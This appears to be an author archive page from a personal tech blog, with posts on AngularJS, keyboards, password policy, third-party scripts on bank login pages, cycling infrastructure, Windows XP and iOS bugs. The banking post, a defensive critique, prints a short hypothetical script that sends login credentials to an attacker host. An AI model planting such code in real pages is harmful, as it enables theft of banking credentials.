All posts by Marc Durdin

Extending $resource in AngularJS

I’ve recently dived into the brave new world (for me) of AngularJS, for a development project for a client. I always enjoy learning new tools and frameworks, especially when there are good design principles and practices that I can apply to both the new project and filter back into existing code.

In this project, we have an existing backend that delivers data through a RESTful JSON interface. And this is exactly what $resource was designed for. The front end is an HTML document embedded in an existing thick-client application window. Yes, this is the real world.

The data returned by $resource can be either a single item, or an array of items — a collection. $resource automatically wraps each item in the array with the “class” of the single item, which is nice. This makes it trivial to extend items with helper functions, such as, in my case, a time conversion function for a specific field in the JSON data (pseudocode):

angular.module('appServices').factory('Widget', ['$resource',
  function($resource) {
    var Widget = $resource('/data/widgets/:widgetId.json', {}, {
      query: {method:'GET', params:{widgetId:''}, isArray:true}
    });

    Widget.prototype.createTimeInMinutes = function() {
      var m = moment(this.createDateTime);
      return m.hours()*60 + m.minutes();
    };
    
    // ... further helpers elided ...

    return Widget;
  }]);

However, finding a way to extend the collection was also of interest to me. For example, to add an itemById function which would return a single item from the array, identified by a unique identifier field. This is, of course, me applying my existing object-oriented brain to Angular (FWIW, this post was the best intro to Angular that I have found, even though it’s about coming from jQuery and not from an OO world).

It seemed nice to me to be able to write something like collection.itemById(), or item.createTimeInMinutes(), associating these functions with the data that they manipulate. Object orientation doing what it does best.  While I was aware of advice about the dangers of extending built-in object prototypes (monkey-patching), I really wasn’t sure that the same concerns applied to extending an ‘instance’ of Array.

There were several answers on Stack Overflow that related to this, in some way, and helped me think through the problem. I (and others) came up with several possible solutions, none of which were completely beautiful to me:

  1. Extend the array returned from $resource.  This is actually hard to do, but in theory possible with transformResponse. Unfortunately, because AngularJS does not preserve extensions to Array objects, you lose those extensions very easily. I won’t add the code here because it is ultimately unhelpful.
  2. Wrap the array in a helper object, when loading in the controller:
    Resource.query().$promise.then(function(collection) {
      $scope.collection = new CollectionWrapper(collection);
    });

    This worked, again, but added a layer of muck to every collection, which was unpalatable to me, and pushed implementation into the controller, which just felt like the wrong place.

  3. Add a helper object:
    var CollectionHelper = {
      itemById: function(collection, id) {
        // assumes each item has a unique 'id' field
        for (var i = 0; i < collection.length; i++) {
          if (collection[i].id === id) return collection[i];
        }
        return null;
      }
    };
    
    ...
    
    var item = CollectionHelper.itemById(collection, id);

    Again, this didn’t feel clean, or quite right, although it worked well enough.

  4. Finally, James suggested using a filter.
    angular.module('myapp').filter('byId', function() {
        return function(collection, id) {
          // assumes each item has a unique 'id' field
          for (var i = 0; i < collection.length; i++) {
            if (collection[i].id === id) return collection[i];
          }
          return null;
        }
      });
    
    ...
    
    var item = $filter('byId')(collection, id);
    // or you can go directly if injected:
    var item = byIdFilter(collection, id);
    // and within the template you can use:
    {{collection | byId:id }}
    

This last is certainly the most Angular way of doing it.  I’m still not 100% satisfied, because filters have global scope, which means that we need to give them ugly names like collectionDoWonk, instead of just doWonk.

Is this the best way to skin this cat?

Cursor Keys Have Not Improved

I’m a keyboard guy. And I think keyboards suck. In fact, I wrote about this before.

I found two new ugly specimens for today’s little rant, and your perusal. Both these keyboards have a reasonably traditional layout, but both fail, for different reasons. These two keyboards were in our conference room.

Microsoft Wireless 800

What’s wrong with this?

  1. It has no gaps between the different parts of the keyboard. Muscle memory fail.
  2. It has a bizarre scooped out shape, not really visible in the photo, which seems to encourage pressing the wrong row of keys.
  3. It has no gaps. This is so bad that it bears repeating. Without gaps, you have to look for the key because you can’t feel for it. Every time.

I thought I was the only one who really hated this keyboard with a passion, but enough other people complained about it that we replaced it with a Dell keyboard. I don’t know what has happened to the Microsoft keyboard. It’s entirely possible someone burned it.

Dell Latest

So this one, at first glance, improves on the Microsoft keyboard by reintroducing that classic design feature: white space, or black space. Just space. Y’know, gaps between different parts of the keyboard. Space is not entirely at a premium on our conference room table. But:

  1. The keys are modern funky flat keys with an unsatisfying deadness to them.
  2. The wrong size! Little tiny navigation keys for big fingers.
  3. And the media keys are encroaching on the navigation key space.
  4. What is the Clear key for? And what have you done with Num Lock? And Scroll Lock? And Pause/Break?
  5. I have nothing against the moon, but why do we need a moon key on our keyboard?

These things cost us time and productivity. It may seem minor, but moving between keyboards has become a constant frustration. I wish we as an industry could do better.

Everything you (thought you) knew about Internet password security is wrong

Time and time again, we see calls from security experts for complex passwords.   Make sure your password includes lower case letters, upper case letters (how xenoglossophobic!), numerals, punctuation, star signs, and emoji.  It must be no less than 23 characters long and not use the same character twice.  Change your password every 60 days, every 30 days, every half hour.  Don’t use the same password again this year, or next year, or for the next 6 galactic years.  Never write your password down.  Especially not on a post-it on your monitor.  Or under your keyboard.

The Golden Password Rules

And it’s all wrong.  There are just two rules you need to remember, as an Internet password user:

  1. Never use the same password in two places.  Like, if you have a Yahoo account and a Google account, don’t let them share the same password.  They’d be offended if they knew you did anyway.
  2. Make sure your password isn’t “guessable”, like your pet’s name, or your middle name.  Or anyone’s middle name.  Or “password”.  Or anything like that.  But “correct horse battery staple” is probably ok, or it was until xkcd published that cartoon.

It’s all wrong because all that complexity jazz is just part of an arms race in the brute force or dictionary attack password cracking game.

Say what? So a brute force attack is, in its simplest form, a computer — or hundreds of computers — trying every single password combination they can think of, against your puny little password. And trust me when I say a computer can think of more passwords than you can. Have you ever played Scrabble against a computer?
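
To put some rough numbers on that, here is a back-of-envelope sketch in JavaScript (the character-set size and guess rate are illustrative assumptions, not measurements):

    // Search space for an 8-character password drawn from
    // the 95 printable ASCII characters
    var keyspace = Math.pow(95, 8);        // ≈ 6.63e15 candidates
    var guessesPerSecond = 1e10;           // assumed: an offline GPU cracking rig
    var seconds = keyspace / guessesPerSecond;
    console.log((seconds / 86400).toFixed(1) + ' days');  // ≈ 7.7 days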

Brute force attacks on Internet passwords are only effective on well designed sites when that site has already been compromised.  At which point who cares if they know your password to that site (because rule 1, remember): they also know everything else that site has recorded about you.  And anyway you can just change that password.  No problem (for you; the site owners have a big problem).

Now, if you are unlucky enough to be targeted, then complex passwords are not going to save you, because the attackers will find another way to get your data without needing to brute force your Google Apps password.  We’ve seen this demonstrated time and time again.  And if you are not being targeted, then you can only be a victim of random, drive-by style password attacks.  And if you followed rule 2, then random, drive-by style password attacks still won’t get you, because the site owner has followed basic security principles to prevent this.  And if the site owner has not followed basic security principles, then you are stuffed anyway, and password complexity still doesn’t matter.

In fact, complex passwords and cycling regimes actually hurt password security.  The first thing that happens is that users, forced to change passwords regularly, can no longer remember any passwords.  So they start to use easier to guess passwords.  And eventually, their passwords all end up being some variation of “password123!”.

The Bearers of Responsibility

The people who really have to do the hard yards are the security experts, software developers, and the site owners.  They are the keepers of the password databases and bear a heavy burden for the rest of us.  Some suggestions, by no means comprehensive, for this to-be-pitied crew:

  1. Thwart dictionary attacks on Internet-facing password entry.  That is, throttle connection attempts, delay for 15 seconds after 10 attempts, require 2nd level authentication after failed attempts, that kind of thing.  These solutions are well documented; a minimal throttling sketch follows this list.
  2. Control access to your password database (duh).  Remember, in the good ol’ days of Unix, passwords were stored in /etc/passwd, which was world readable, and so the enterprising young hacker could just copy the file and try to crack it in their own good time elsewhere.  So keep other people’s dirty paws off your (hashed) password database.
  3. Don’t ever display passwords in plain text.  No “here is your password” emails.  Not even for registration.  That has to be a one time token.  Your password database is hashed, right?  Not ROT13?
  4. Notify a user if someone tries to access their account multiple times.  Give them the power to fret and stress.
  5. If your site gets hacked, tell your users as soon as you possibly can, and reset your password database.  Mind you, they’ll just have to change their password for your site because they’ve been following rule 1 above, right?  Oh, and don’t be too ashamed to tell anyone.  It happens to all the best site owners and there’s nothing worse than covering it up.
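
To illustrate point 1, here is a minimal throttling sketch in JavaScript. The thresholds match the suggestion above; the function names and in-memory storage are my own illustrative choices, not a production design:

    // Track failed login attempts per account, in memory
    var failedAttempts = {};

    // Returns false if the account is still in its lock-out window
    function mayAttemptLogin(username) {
      var entry = failedAttempts[username];
      return !entry || Date.now() >= entry.delayUntil;
    }

    // Call after each failed password check
    function recordFailure(username) {
      var entry = failedAttempts[username] || { count: 0, delayUntil: 0 };
      entry.count++;
      if (entry.count >= 10) {
        entry.delayUntil = Date.now() + 15000;  // delay 15 seconds after 10 attempts
      }
      failedAttempts[username] = entry;
    }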

The Flaw in My Rant

Still, my rant has a problem.  It’s to do with Rule 1:  A separate password for every site.  But just how many sites do I have accounts for?  Right now?  402 sites.

Yikes.

How do I manage that?  How can I remember passwords for 402 sites?  I can’t!  So I put them into a database, of course.  Managed by a password app such as KeePass or 1Password or Password Safe. Ironically, as soon as I use a password manager, I no longer have to make up passwords, and they actually end up being random strings of letters, numbers and symbols. Which keeps those old-fashioned password nazis happy too.
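
Generating those random passwords is simple enough. Here is a minimal Node.js sketch; the length and character set are illustrative (and note the slight modulo bias, acceptable for illustration but worth removing in a real generator):

    var crypto = require('crypto');

    function randomPassword(length) {
      var charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' +
                    'abcdefghijklmnopqrstuvwxyz' +
                    '0123456789!@#$%^&*';
      var bytes = crypto.randomBytes(length);
      var result = '';
      for (var i = 0; i < length; i++) {
        result += charset[bytes[i] % charset.length];  // slight modulo bias
      }
      return result;
    }

    console.log(randomPassword(20));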

Personally, I keep a few high-value passwords out of the password database (think Internet Banking) and memorise them instead.

Of course, my password safe itself has just a single password to be cracked.  And because I (the naive end user) store this database on my computer, it’s probably easy enough to steal once I click on that dodgy link on that site…  At which point, our black hat password cracker can roll out their full armada of brute force password cracking flying robots to get into my password database.  So perhaps you still need that complex password to secure your password database?

What do you think?

Note: Roger Grimes stole my thunder.

Risks with third party scripts on Internet Banking sites

This morning, Firefox stalled while loading the login page for the ANZ Internet Banking website. Looking at the status bar, I could see that Firefox was attempting to connect to a website, australianewzealandb.tt.omtrdc.net. This raised immediate alarm bells, because I didn’t recognise the website address, and it certainly wasn’t an official anz.com sub-domain.

ANZ login delay – note the status message at the bottom of the window

The connection eventually started, and the page finished loading — just one of those little glitches loading web pages that everyone encounters all the time, right? But before I entered my ID and password, I decided I wasn’t comfortable to continue without knowing what that website was, and what resources it was providing to the ANZ site.

And here’s where things got a little scary.

It turns out that australianewzealandb.tt.omtrdc.net is a user tracking web site run by marketing firm Omniture, now a part of Adobe.  The ANZ Internet Banking login page is requesting a Javascript script from the server, which currently returns the following tiny piece of code:

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

The Scare Factor

This script is run within the context of the Internet Banking login page. What can scripts that run within that context do? At worst, a script can be used to watch your login and password and send them (pretty silently) to a malicious host. This interaction may even be undetectable by the bank, and it would be up to you and your computer to be aware of this and block it — a big ask!
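
To make this concrete: a hypothetical credential-stealing payload needs only a few lines. The element IDs and attacker URL below are invented for illustration:

    // Hypothetical payload: exfiltrate credentials when the form is submitted.
    // 'loginForm', 'customerId', 'password' and the attacker URL are invented.
    document.getElementById('loginForm').addEventListener('submit', function() {
      new Image().src = 'https://attacker.example/log' +
        '?u=' + encodeURIComponent(document.getElementById('customerId').value) +
        '&p=' + encodeURIComponent(document.getElementById('password').value);
    });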


The Relief

Now, this particular script is fortunately not malicious! In fact, as the mboxFactories variable actually is undefined on this page, this script does nothing at all. In other words, it’s useless and doesn’t even need to be there!  (It’s definitely possible that the request for the script is being used on the server side to log client statistics, given the comprehensive parameters that are passed in the HTTPS request for the script.)

What are the risks?

So what’s the big deal with running third party script on a website?

The core issue is that scripts from third party sites can be changed at any time, without the knowledge of the ANZ Internet Banking team. In fact, different scripts can be served for different clients — a smart hacker would serve the original script for IP addresses owned by ANZ Bank, and serve a malicious script only to specific targeted clients. There would be no reliable way for the ANZ Internet Banking security team to detect this.


Another way of looking at this: it’s standard practice in software development to include code developed by other organisations in applications or websites. This is normal, sensible, and in fact unavoidable. The key here is that any code must be vetted and validated by a security team before deployment. If the bank hosts this code on their own servers, this is a straightforward part of the deployment process. When the bank instead references a third party site, this crucial security step is impossible.

Banking websites are among the most targeted sites online, for obvious reasons. I would expect their security policies to be conservative and robust. My research today surprised me.

Trust

How could third party scripts go wrong?

First, australianewzealandb.tt.omtrdc.net is not controlled by ANZ Bank.  It’s controlled by a marketing organisation in another country.  We don’t know how much emphasis they place on security. We are required to trust a third party from another country in order to login to our Internet Banking.

This means we need to trust that none of their employees are malicious, that they have strong procedures in place for managing updates to the site, the servers and infrastructure, and that their organisation’s aims are coincident with the tight security requirements of Internet Banking. They need to have the same commitment to security that you would expect your bank to have. That’s a big ask for a marketing firm.

Security

The ANZ Internet Banking website is of course encrypted, served via HTTPS, the industry standard method of serving encrypted web pages.

We can tell, just by looking at the address bar, that anz.com uses an Extended Validation certificate.

With a little simple detective work, we can also see that anz.com serves those pages using the TLS_RSA_WITH_AES_256_CBC_SHA encryption suite, using 256-bit keys.  This is a good strong level of encryption, today.

However, australianewzealandb.tt.omtrdc.net does not measure up. In fact, this site uses 128-bit RC4+SHA encryption and integrity and does not have an Extended Validation certificate. RC4 is not a good choice today, and neither is SHA. This suggests immediately that security is not their top concern, which should then be an immediate concern to us!

ANZ vs Omtrdc Security

I should qualify this a little: Extended Validation certificates are not available for wildcard domains, which is the type of certificate that tt.omtrdc.net is using. This is for a good reason: “in order to ensure that EV SSL Certificates are not issued fraudulently or misused after issuance.” It’s worth thinking through that reason and seeing how it applies to this context.

Malicious Actors

So how could a nasty person steal your money?

In theory, if a nasty person managed to hack into the Adobe server, they could simply supply a script to the Internet Banking login page that captures your login details and sends them to a server, somewhere, anywhere, on the Internet. This means that we have to trust (there’s that word again) that the marketing firm will be proactive in updating and patching not only their Internet-facing servers, but their infrastructure behind those servers as well.

If a bad actor has compromised a certificate authority, as has happened several times recently, they can target these third party servers. Together with a DNS cache poisoning or Man-In-The-Middle (MITM) attack, even security-savvy users will be unlikely to notice fraudulent certificates on the script servers.

Security flaws like Heartbleed are exacerbated by this setup. Not only do the bank security team have to patch their own servers, they also have to push the third party vendors to patch theirs as a priority.

Protect Yourself

As a user, run security software. That’s an important first step. Security software is regularly refreshed with blacklists of known malicious sites, and this will hopefully minimize any window of opportunity that an untargeted attack may have. I’m not going to recommend any particular brand, because I pretty much hate them all.

If you want to unleash your inner geek and be aware of how sites are using third party script servers, you can use Developer Tools included in your browser — press F12 in Internet Explorer, Chrome or Firefox, and look for the Network tab to see a list of all resources referenced by the site. You may need to press Ctrl+F5 to trigger a ‘hard’ refresh before the list is fully populated.

I’ve shown below the list of resources, filtered for Javascript, for the National Australia Bank Internet Banking site.  You can see two scripts are loaded from one site — again, a market research firm.


Simplistic Advice for Banks

Specifically to mitigate this risk, banks should consider the following:

  • Serve all scripts from your own domain and vet any third party scripts that you serve before deployment.
  • In particular, check third party scripts for back end communication, via AJAX or other channels.
  • Minimize the number of third party scripts anywhere that secure content must be presented.
  • Use the Content-Security-Policy HTTP header to prevent third party scripts on supported browsers (most browsers today support this); a sample policy follows this list.
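
For example, the following policy instructs supported browsers to load scripts only from the serving domain itself. The directive syntax is standard CSP; the policy shown is an illustrative minimum rather than a recommendation:

    Content-Security-Policy: script-src 'self'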

There are of course other mitigations, such as Two Factor Authentication (2FA), which do reduce risk. However, even 2FA should not be considered a silver bullet: it is certainly possible to modify the login page to take over your current login in real time — all the user would see is a message that they’d mistyped their password, and as they log in again, the malicious hacker is actively draining money from their account.

A final thought on 2FA: do you really want a hacker to have your banking password, even if they don’t have access to your phone? Why do we have these passwords in the first place?

Browser Developers

I believe that browser vendors could mitigate the situation somewhat by warning users if secure sites reference third party sites for resources, in particular where these secure sites have lower quality protection than the first party site. This protection is already in place where content is requested over HTTP from a HTTPS site, known as mixed content warnings.

There is no value in an Extended Validation certificate if any of the resources requested by the site are served from a site with lower quality encryption! Similarly, if a bank believes that 256-bit AES encryption is needed for their banking website, a browser could easily warn the user that resources are being served with lower quality 128-bit RC4 encryption.

Australian Banks

After this little investigation, I took a quick look at the big four Australian banking sites — ANZ, Commonwealth Bank, National Australia Bank, and Westpac.  Here’s what I found; this is a very high-level overview and contains only information provided by any web browser!

Bank               | Bank site security            | # 3rd party scripts | Third party sites                   | Third party security
ANZ Bank           | 256-bit AES (EV certificate)  | 1                   | australianewzealandb.tt.omtrdc.net  | 128-bit RC4
NAB                | 256-bit AES (EV certificate)  | 2                   | survey.112.2o7.net                  | 256-bit AES
Westpac            | 128-bit AES (EV certificate)  | None!               |                                     |
Commonwealth Bank  | 128-bit AES (EV certificate)  | 9!                  | ssl.google-analytics.com            | 128-bit AES
                   |                               |                     | commonwealthbankofau.tt.omtrdc.net  | 128-bit RC4
                   |                               |                     | google-analytics.com                | 128-bit AES
                   |                               |                     | d1wscoizcbxzhp.cloudfront.net       | 128-bit AES
                   |                               |                     | cba.demdex.net                      | 128-bit AES

Do you see how the *.tt.omtrdc.net subdomains are used by two different banking sites? In fact, this domain is used by a large number of banking websites. That would make it an attractive target, wouldn’t you think?

I reached out to all 4 banks via Twitter (yeah, I know, I know, “reached out”, “Twitter”, I apologise already), and NAB was the first, and so far only, bank to respond:

Kudos are due to NAB and Westpac — NAB for responding so promptly, and Westpac, for not having the issue in the first place!

Updates (6:10am, 9 Sep 2014), with thanks, in no particular order:

Many thanks to Troy Hunt for suggesting I write this, then tweeting it — and for his continual and tireless work in websec!

Stefano Di Paola mentioned a previous Omniture vulnerability and referenced 3rd party script risks in his blog:

hillbrad⚡ mentioned a W3C project to make validation of sub-resource integrity possible:

Erlend Oftedal reminded me that this is not a new issue and mentioned his blog post from 2009:

Nearly crushed by a cement truck on my ride today

Update 2 July 2014: Added two diagrams to the mitigation section for the Boral Concrete Forecourt.

An unfolding story

So, I was nearly crushed by a cement truck today.  It came around a corner, at about 40km/h, without indicating.  I was doing just 25km/h on my bike, which was fortunate, as otherwise I probably would be writing this from a hospital bed, or from a comfy freezer down at the neighbourhood morgue (do they have wifi?).

Perhaps he’d stepped in some cement during his delivery run, and found it hard to ease off the accelerator pedal.  Whatever the case, I don’t want to lay all the blame for this near miss at the feet of the driver.

That’s because the real problem lies with the Hobart City Council. This incident occurred on the primary, and best, cycling route North out of the city.  The HCC maps describe this route as an “Off-road – Shared Footway/Bicycle Path.”  I think I will now describe it as an “Off-road – Shared Footway/Bicycle/Cement Truck Path.”

The site in question is the Boral Concrete Depot, through which the cycle route happily wends its way; it is probably the most dangerous of the obstacles which the intrepid commuter cyclist must negotiate on his or her way out of Hobart City.  But it is by no means the only obstacle.

An interview

Before I go into more detail on the obstacles, with pictures and lots of fun, I have taken down an Official Report from myself, viz.:

I was proceeding on my pedal cycle in a Northerly direction, at approximately twenty-five (25) kilometres per hour, through the Forecourt of the Boral Concrete Depot, upon the principal cycle route as shown on Council Maps, and paying due attention to traffic on the adjacent Highway, when my attention was caught by an approaching Cement Mixer Truck (henceforth, CMT).  Said CMT was proceeding in a Southerly direction at a speed which I estimate at no less than forty (40) kilometres per hour, and as CMT had not indicated that it would be leaving the aforementioned Highway, I presumed that it would continue past the entrance into the forecourt.

To my surprise, when the CMT reached the entrance of the Forecourt, it abruptly swung off the Highway and into the Forecourt, at speed, at which point I executed Evasive Manœuvres, to wit, braking sharply and turning my vehicle (2 wheeled pedal cycle) towards the West.  Additionally, I immediately alerted the driver of CMT to the impending danger with a carefully worded, shouted, phrase.

CMT then braked heavily; however this action was no longer necessary as I had already averted the danger with my Evasive Manœuvres.  I then proceeded, unharmed, on my journey, albeit with an elevated heart rate (see Figure 1 – ed).

Figure 1 – Heart Rate and Speed
Figure 2 – Incident Diagram

Your daily obstacle course commute

The Intercity Cycleway is by far the most established and concrete (there’s that word again) piece of bicycle infrastructure in Hobart. Following the railway line North from the Docks, through Moonah, Glenorchy and Montrose, it is used by hundreds (in Summer, thousands) of cyclists a day for commuting and exercise. And until you reach the Cenotaph, it is, by and large, a decent piece of cycle infrastructure.

The bliss of the Intercity Cycleway

I think a good question to ask when looking at bicycle infrastructure design is: is it safe for an 8 year old to ride? Not necessarily unaccompanied, but looking more at bicycle control and potential danger points. And at the Cenotaph, things start to go downhill. First, we encounter a confusing road crossing, up-hill, with traffic approaching from 4 different directions. The confusion is mitigated by typically low speeds, but it’s not a good start.

Traffic comes from four different directions as you exit the Intercity Cycleway

After crossing the road, a cyclist is presented with two possible routes. The official route heads slightly up hill, and a secondary route heads past the Cenotaph. All well and good, almost.

Approaching the Cenotaph – Two Routes

The “almost” comes into play shortly. The official route turns abruptly at the edge of the highway, where traffic is passing at 70km/h. There is no safety barrier.

Approach the Highway, and Turn Left

Here the path goes downhill, literally. The typical cyclist picks up a bit of speed here, coasting down the hill. We reach the other end of the Cenotaph route.

This point is just plain dangerous, which is no doubt why the newer, ‘official’ route was introduced. However, without signage or recommendation, there is nothing to encourage riders to use the slightly less dangerous, slightly longer route. So what’s the problem?

Mind you don’t miss the corner!
  1. There is a conflict point with cyclists merging, at speed, coming down hill both on the official route, and the Cenotaph route. This can be a conflict with pedestrians as well.
  2. Worse, cyclists coming down the Cenotaph route run a significant risk of overshooting, if not careful, into the highway. I have seen a cyclist do this. They were lucky: no cars were in the near lane.

Now we approach the bottom of the hill, with a blind corner. Pedestrians regularly round this corner on the “wrong” side of the shared path. Cyclists should ride their brakes down here to avoid picking up too much speed.

Approaching Boral Concrete

Confusion ensues: there are three marked routes here. Which is the proper route? The only frequently used route is the closest exit onto the forecourt roadway. But this exit is also the most dangerous, as I found today. The two more distant exits are just awkward to access. This forecourt is dangerous: with traffic entering from the highway, potentially at speed, and trucks turning and reversing, it’s just not a great place for bikes. Yet it is smack bang on the primary bike route into Hobart.

The iPhone does a Telephoto Spy Shot into Boral Concrete’s Depot
The Forecourt, Heading North
Yes, Ride Past the No Entry Sign to exit South
The Route North to the Intercity Cycleway in all its glory
One of the three off ramps into the forecourt

Things improve a little on the far side: we have a reasonably well marked pathway, albeit with another sharp corner right on the edge of the highway.

Turn Hard Left. This does not qualify as high quality infrastructure, sorry!

Now we are faced with a traffic light pole in the middle of the path, narrowing the path in one direction to less than a metre right beside a very busy roadway. That’s nasty.

The Pole

The next section, however, is quite pleasant, offset from the road and through an avenue of trees. Apart from some minor maintenance on the ‘cobblestones’ to level them out, I have no complaints.

Pleasant Times

Now we come to the Hobart Docks precinct. First we have a road crossing, with a separate light and control system for bicycles. I’m not sure why. The button is on the wrong side of the path, causing conflict for oncoming bicycles.

Road crossing

Enough has been said about the placement of this Cafe. But perhaps the signs which frequently encroach into the bike lane (not too badly in the photo today, but worse on other days) should be relocated.

The Cafe
A Sign Encroaches

Crossing the docks themselves is not ideal, with a path shared with pedestrians and parking cars. But it is a low speed area and most of the conflicts are overcome without too much trouble. However, the Mures carpark entrance is still dangerous, even with the upgraded crossing treatment. Sight lines are poor and I have observed drivers crossing this intersection at speed, attempting to make it into a break in the traffic on Davey St.

Crossing the Mures Entrance

Finally, we have another shared path, with a somewhat ambiguously marked bike lane on the street side of it. Perhaps it would be better to treat the whole path as shared, and not ‘reserve’ a section for bikes if it isn’t going to be clearly marked, but it’s not a big issue.

Shared Path Past Docks

Mitigations

The sections of the track that need attention most urgently are those along the edge of the highway, and where the route crosses the Boral Concrete forecourt area.

Engineers Australia Building

Travelling from the city this time, the first danger point, where the path traverses the edge of the highway and narrows around the traffic light pole, could be improved by shifting the bike path away from the edge of the road, and across the otherwise empty lawns outside the Engineers Australia building. No doubt there are some property boundary issues there. But perhaps it wouldn’t hurt to ask them? Even a one or two metre setback would improve the situation considerably.

Adjusting the shared path past the Engineers Australia building

Boral Concrete Forecourt

The safest solution to this area would be to close the car and truck access to and from the highway entirely, and reroute traffic to Boral Concrete and the Engineers Australia building through the dockyards. This would also address the problematic entrance of vehicles onto the highway in the middle of a major intersection.

Alternative access to Boral Concrete
Close highway access to forecourt

This may be a hard sell; however, if the Hobart City Council wants to increase the share of trips into the city made by bike, it will need to take serious steps to improve the safety of this primary route through this area.

Realignment of path past Cenotaph

The bike path along the side of the highway could be rerouted behind the Cenotaph, or with some work, shifted away from the edge of the highway. Alternatively, a safety barrier could be put into place along the path beside the highway.

Alternate Cenotaph Routes: both would take some work

I’ve been wanting to write this post for quite a while. The Incident of the Cement Truck was sufficient to rekindle my blogging ‘abilities’. Other posts in the Hobart Bike Infrastructure series:

Fifty-nine vulnerabilities, or do you feel safe using Windows XP?

In today’s Microsoft Security Bulletin release was a very long list of vulnerabilities fixed in Internet Explorer. A very long list. 59 separate vulnerabilities to be exact. I do believe that is a record.

But I’m not here to talk about the record — I am more interested in the steps Windows XP users will take to mitigate the flaws, because Microsoft are not patching any of these vulnerabilities for Windows XP! Some people I’ve talked to, from individuals up to enterprises, seem to have the idea that they’ll practice “Safe Computing” and be able to continue using Windows XP and avoid paying for an upgrade.

What do I mean by Safe Computing? Y’know, don’t open strange attachments, use an alternate web browser, view emails with images switched off, keep antivirus and malware protection software up to date, remove unused applications, disable unwanted features, firewalls, mail and web proxies, so on and so forth.

So let’s look at what the repercussions are of practicing Safe Computing in light of these disclosures.

The first mitigation you are going to take is, obviously, to stop using Internet Explorer. With this many holes, you are clearly not going to be able to use Internet Explorer at all. This means a loss of functionality, though: those Internet Explorer-optimised sites (I’m looking at you, just about every corporate intranet) often don’t even work with non-IE browsers. So if you have to use IE to view these ‘trusted’ sites, you must ensure you never click on an external link, or you will be exposed again. Doable, but certainly a hassle.

Okay, so you don’t use IE now. You use Firefox, or Chrome. But you’re still in trouble, because it turns out that the very next security bulletin announces that GDI+ and Uniscribe are, as of today, both vulnerable as well. GDI+ is used to display images and render graphics in Windows, and Uniscribe is used by just about every application to draw text onto the screen, including all the major web browsers. The Uniscribe flaw relates to how it processes fonts. The GDI+ flaw relates to a specific metafile image format.

So, disable support for downloadable fonts in your browser, and disable those specific metafile image types in the Windows Registry. Yes, it can be done. Now you’ll be all good, right? You don’t need those fonts, or those rare image types, do you? You can still surf the web okay?

But you’ve lost functionality, which we might not value all that highly, but it’s still a trade-off you’ve had to make.


And this is my point. From today, and on into the future, every security flaw that is announced will force you to trade yet more functionality for security. Eventually, you will only be able to use Windows XP offline — it simply will not be possible to safely access Internet resources without your computer and your data being compromised. It’s going to get worse from here, folks. It is well and truly past time to upgrade.

Only 21? Do you feel safe yet?

iOS 8 beta 1 — first bug reports

Like every other iOS developer, I have already downloaded and installed Xcode 6 and the first beta of iOS 8.0 onto one of my test iDevices. And, like every other iOS developer, I immediately went to test one of my apps on the new build. And, unfortunately, as can be expected with a beta, I found a bug. I have dutifully filed a bug report via Apple’s bugreport.apple.com!

Given that bug reports are private, I have opted to make this information public here, because many, many of my product users have asked me about it: the bug first arose with iOS 7.1, and I had hoped that it would be addressed in 8.0. Most of my users are not technical enough to navigate the bugreport.apple.com interface, so their only recourse is to complain to us!

Bug #1: Custom font profiles fail to register and work correctly after device restart

We have developed a number of custom font profiles for various languages, following the documentation on creating font profiles for iOS 7+ at https://developer.apple.com/library/ios/featuredarticles/iPhoneConfigurationProfileRef/iPhoneConfigurationProfileRef.pdf. Each of these profiles exhibits the same problem: after the font profile is installed, the specific language text usually displays in all apps, including Notes, Mail and more. However, as soon as the device is restarted, the font fails to display in any apps. In some cases, residual display of the font continues after the restart, but any edit to the text causes the display to revert to .notdef glyphs or similar.

Amharic text before the font profile is installed — square boxes
Amharic text after the font profile is installed: now readable.  But not for long.

Even before the device is restarted, font display is sometimes inconsistent. For example, if you shut down Mail and restart it, fonts will sometimes display correctly and sometimes incorrectly.

The samples given are using the language Amharic.  The font profile can be installed through my Keyman app, available at http://keyman.com/iphone.

A sample of text in Amharic is ጤና ይስጥልን (U+1324 U+1293 U+0020 U+12ED U+1235 U+1325 U+120D U+1295).  This text displays correctly when the font profile is first installed, in some situations, and always displayed correctly in iOS 7.0.   The issue first arose in iOS 7.1 and has continued into the iOS 8.0 beta.

References:

Bug #2: Touches on fixed elements in Safari are offset vertically

In Safari in iOS 8.0 beta 1, I have found that touching fixed elements often results in a touch which is 200-odd pixels north of the actual location I touch.  No doubt plenty of people will report this one!

Using Delphi attributes to unify source, test and documentation

Updated 28 May 2014: Removed extraneous unit reference from AttributeValidation.pas. Sorry…

What problem was I trying to solve?

Recently, while using the Indy Internet components in Delphi XE2, I was struggling to track the thread contexts in which certain code paths ran, to ensure that resource contention and deadlocks were correctly catered for.

Indy components are reasonably robust, but use a multithreaded model which, it turns out, is difficult to get 100% correct.  Component callbacks can occur on many different threads:

  • The thread that constructed the component
  • The VCL thread
  • The server listener thread
  • The connection’s thread
  • Some, e.g. exceptions, can occur on any thread

Disentangling this, especially when in conjunction with third party solutions that are based on Indy and may add several layers of indirection, quickly becomes an unenjoyable task.

I started adding thread validation assertions to each function, to ensure that I was (a) understanding which thread context the function was actually running in, and (b) not calling the function in the wrong context myself.  However, when browsing the code, it was still very difficult to get a big picture view of thread usage.

Introducing attributes

Enter attributes.  Delphi 2010 introduced support for attributes in Win32, and a nice API to query them with extended Run Time Type Information (RTTI).  This is nice, except for one thing: it’s difficult at runtime to find the RTTI associated with the current method.

In this unit, I have tried to tick a number of boxes:

  • Create a simple framework for extending runtime testing of classes with attributes
  • Use attributes to annotate methods, in this case about thread safety, to optimise self-documentation
  • Keep a single, consistent function call in each member method, to test any attributes associated with that method.
  • Sensible preprocessor use to enable and disable both the testing and full RTTI in one place.

One gotcha is that by default, RTTI for Delphi methods is only available for public and published member methods.  This can be changed with the $RTTI compiler directive but you have to remember to do it in each unit!  I have used a unit-based $I include in order to push the correct RTTI settings consistently.

I’ve made use of Delphi’s class helper model to give direct access to any object at compile time.  This is a clean way of injecting this support into all classes which are touched by the RTTI, but does create larger executables.  I believe this to be a worthwhile tradeoff.

Example code

The code sample below demonstrates how to use the attribute tests in a multi-threaded context. In this example, an assertion will be raised soon after cmdDoSomeHardWorkClick is called. Why is this? It happens because the HardWorkCallback function on the main thread is annotated with [MainThread] attribute, but it will be called from TSomeThread‘s thread context, not the main thread.

